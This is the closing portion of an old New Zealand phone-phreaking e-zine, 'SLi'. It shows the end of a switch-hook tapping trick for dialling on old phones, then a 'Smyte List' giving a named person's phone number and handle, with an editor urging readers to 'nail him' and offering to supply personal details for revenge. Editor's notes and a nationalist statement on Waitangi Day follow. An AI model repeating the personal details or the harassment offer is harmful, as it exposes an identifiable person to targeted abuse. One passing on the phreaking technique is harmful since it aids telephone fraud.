tap the s-h 10 times, pause, 10, pause, 9, pause, 8, pause, 10, pause,
|
|
8, pause, 5, pause, 6, pause, 8, pause, 2, pause, 3, pause, 7.
|
|
|
|
An easy way of remembering it, is to simply add the number to the amount of
|
|
taps of the switch-hook and it should equal 10.
|
|
This is an old idea, but it works on these old phones.
|
|
|
|
|
|
|
|
|
|
SLi
|
|
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^ Smyte List ^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
|
|
Southern Lights
|
|
inc.
|
|
|
|
|
|
Well, as in all other SLi mags - except #1 - here's a person [and
|
|
his info] who has done a pretty stupid thing, and got the members of
|
|
SLi pissed at him.
|
|
|
|
|
|
Name Info Reason
|
|
--------------------+-------------------------+------------------------------
|
|
|
|
Johnathon Patterson +64-4-527-8021 Pissed CyntaxEra off - not to
|
|
aka [-=[THE_FLY]=-] mention a LOT of other ppl.
|
|
[Eon's note: This guy insulted
|
|
Cyntax and I. He DESERVES
|
|
ALL he GETS. Nail him.]
|
|
|
|
|
|
[Note: If you have someone who has pissed you off lately, you want to 'get in
|
|
touch' with them and think that we MIGHT have their info, just giz us
|
|
a bell with your reason for getting back at this person and we'll see
|
|
what we can do for ya.]
|
|
|
|
|
|
|
|
|
|
SLi
|
|
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^ Editors Knotez ^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
|
|
Southern Lights
|
|
inc.
|
|
|
|
|
|
Damn it! Yet another one of these things! :)
|
|
|
|
Ahh, well, me and Cyntax 'ave given up dak,
|
|
|
|
Oh, yeah - Happy April Fools! :=)
|
|
|
|
Well, it's the end of another SLi mag. Guess it's getting rather predict-
|
|
able now.
|
|
|
|
Well, SLi BBS PRIVATE NODE is up! Email hacker_m@ix.wcc.govt.nz if you
|
|
want the number and instructions to login including the bbs passwd and
|
|
stuff. Oh, BTW, it's 14.4... :)
|
|
|
|
ALSO!!! if you want to send us a note, post it to our PO BOX.
|
|
|
|
Here is the shout out you wanted MysTix!
|
|
PS. SLi V should be out in 3-4 months.
|
|
|
|
Yeah someone wrote me asking if there was a way to turn off call waiting.
|
|
Now, I think it's *52.
|
|
|
|
Oh, and I'd like to say TELECOM RISK MANAGEMENT (aka. Telco security)
|
|
isn't that bad. Hey, I'd even accept some feedback from them. :) Anyone
|
|
wanna write me a letter? I'm sure you can find my address :\ I take that
|
|
back. I'll just say, "tnx Heather" :-<
|
|
|
|
[Maybe I was wrong. They just killed Cyntax's 3-Way and stuff cause of her
|
|
VMB "ooops". So be it.]
|
|
|
|
God, that Bill Gates guy is a s[h]muck! What an _elite_ haircut he has!
|
|
And, the glasses! Yuck! Oh, god! Look at the tie!! Yellow and black
|
|
rectangles! Of course this is MY opinion and may not be that of the
|
|
civilized world
|
|
|
|
[CyntaxEra's Note: Apologies go out to any people reading this who have that
|
|
tie - we're very sorry for you. ;)]
|
|
|
|
|
|
Another Tip: SLi uses 2048 bit encryption on our IMPORTANT junk, and
|
|
512 on our misc stuff - thanks to PGP 2.4x <not the new one, 'cause the US
|
|
Government have indorced it>.
|
|
|
|
Any BBS's that would like to become an OFFICIAL SLi release point, please
|
|
POST a letter to the SLi PO Box, or email me: HACKER_M@IX.WCC.GOVT.NZ.
|
|
|
|
|
|
A Final NOTE:
|
|
|
|
We are ALL New Zealanders - not black, not white but united under ONE
|
|
flag. We are one nation. May we once again become one people.
|
|
Our flag is the symbol of our country, to all who spit on it, to all who
|
|
stomp on it. Take note that thousands died for that flag - both white and
|
|
black! Do not EVER stand on, or deface, OUR symbol of OUR country, for we
|
|
are ONE people united. If you wish to show your disaproval, do it in a
|
|
rightous and honourable way. Not in such a childish and immature way
|
|
without any fore-thought at all.
|
|
|
|
|
|
[This is in accordance to the current disagreements between NZ and a small
|
|
percentage of Maori New Zealanders in reference to this year's Waitangi Day -
|
|
A day which should have been celebrated by all. Sadly the acts of a few have
|
|
made this country two people under one divided flag. Be ashamed of yourself
|
|
all who took part in the division of New Zealand, for these acts will live in
|
|
the history of New Zealand forever as the day New Zealanders became two
|
|
peoples.]
|
|
|
|
|
|
Well, I'll see you all 'round... 'Till next time...
|
|
|
|
.
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Life is Cursed.
|
|
For all who live must die.
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
eof
|